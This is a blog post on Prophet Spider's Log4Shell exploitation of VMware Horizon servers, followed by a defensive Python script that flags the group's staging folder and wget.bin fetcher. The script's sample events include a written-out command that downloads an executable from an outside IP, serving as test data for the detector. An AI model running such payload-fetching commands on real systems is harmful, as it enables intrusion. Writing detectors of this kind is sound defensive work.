gerness.blogg.se

Exploited miners to vmware horizon servers

An initial access broker group tracked as Prophet Spider has been linked to a set of malicious activities that exploit the Log4Shell vulnerability in unpatched VMware Horizon servers. The cybercrime actor has been opportunistically weaponizing the shortcoming to download a second-stage payload onto the victimized systems. The payloads observed include cryptocurrency miners, Cobalt Strike Beacons, and web shells, corroborating a previous advisory from the U.K. National Health Service (NHS) that sounded the alarm on active exploitation of the vulnerabilities in VMware Horizon servers to drop malicious web shells and establish persistence on affected networks for follow-on attacks.

Log4Shell is a moniker used to refer to an exploit affecting the popular Apache Log4j library that results in remote code execution by logging a specially crafted string. Since public disclosure of the flaw last month, threat actors have been quick to operationalize this new attack vector for a variety of intrusion campaigns to gain full control of affected servers. The observed instances of exploitation mirror tactics, techniques, and procedures (TTPs) previously attributed to the Prophet Spider eCrime cartel, including the use of the "C:\Windows\Temp\7fde\" folder path to store malicious files and the "wget.bin" executable to fetch additional binaries, as well as overlaps in infrastructure used by the group.

Prophet Spider is known to have been active since at least May 2017. Like many other initial access brokers, it sells its footholds to the highest bidder on underground forums on the dark web, who then exploit the access for ransomware deployment. Prophet Spider primarily gains access to victims by compromising vulnerable web servers and uses a variety of low-prevalence tools to achieve operational objectives; the group was previously spotted actively exploiting flaws in Oracle WebLogic servers to gain initial access to target environments.
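As an added example (not from the article, CrowdStrike or any other vendor), a small Python triage routine that flags process-creation events carrying the two Prophet Spider indicators named above, the "C:\Windows\Temp\7fde\" staging folder and the "wget.bin" fetcher, and adds a broader, lower-confidence rule of my own for anything executed from C:\Windows\Temp. The event records, host names and command lines are constructed for the demonstration.

```python
import ntpath

# Prophet Spider TTPs named in the article (matched case-insensitively, as Windows paths are).
STAGING_DIR = "c:\\windows\\temp\\7fde\\"
FETCH_TOOL = "wget.bin"
# My broader, lower-confidence generalisation: any image launched from C:\Windows\Temp.
TEMP_DIR = "c:\\windows\\temp\\"

# Constructed sample process-creation events; none of this is real telemetry.
SAMPLE_EVENTS = [
    {"host": "hzn-cs01", "parent": "java.exe",
     "image": "C:\\Windows\\Temp\\7fde\\wget.bin",
     "cmdline": "C:\\Windows\\Temp\\7fde\\wget.bin -O C:\\Windows\\Temp\\7fde\\svc.exe http://203.0.113.9/svc.exe"},
    {"host": "hzn-cs01", "parent": "java.exe",
     "image": "C:\\Windows\\Temp\\7fde\\svc.exe",
     "cmdline": "C:\\Windows\\Temp\\7fde\\svc.exe --config cfg.json"},
    {"host": "hzn-cs02", "parent": "explorer.exe",
     "image": "C:\\Windows\\Temp\\installer.exe",
     "cmdline": "C:\\Windows\\Temp\\installer.exe /quiet"},
    {"host": "hzn-cs02", "parent": "services.exe",
     "image": "C:\\Windows\\System32\\svchost.exe",
     "cmdline": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
]


def classify(event):
    """Return the names of the rules an event matches, highest confidence first."""
    image = event["image"].lower()
    cmdline = event["cmdline"].lower()
    hits = []
    if STAGING_DIR in image or STAGING_DIR in cmdline:
        hits.append("prophet_spider_staging_dir")
    if ntpath.basename(image) == FETCH_TOOL or FETCH_TOOL in cmdline:
        hits.append("prophet_spider_wget_bin")
    if image.startswith(TEMP_DIR):
        hits.append("exec_from_windows_temp")
    return hits


def scan(events):
    """Return (host, image, matched_rules) for every event that trips at least one rule."""
    findings = []
    for event in events:
        rules = classify(event)
        if rules:
            findings.append((event["host"], event["image"], rules))
    return findings


if __name__ == "__main__":
    for host, image, rules in scan(SAMPLE_EVENTS):
        print(f"{host}: {image} -> {', '.join(rules)}")
```

The first two rules are specific enough to page on their own; the third is a hunting lead that needs a baseline of what legitimately runs from the temp directory on your Horizon hosts.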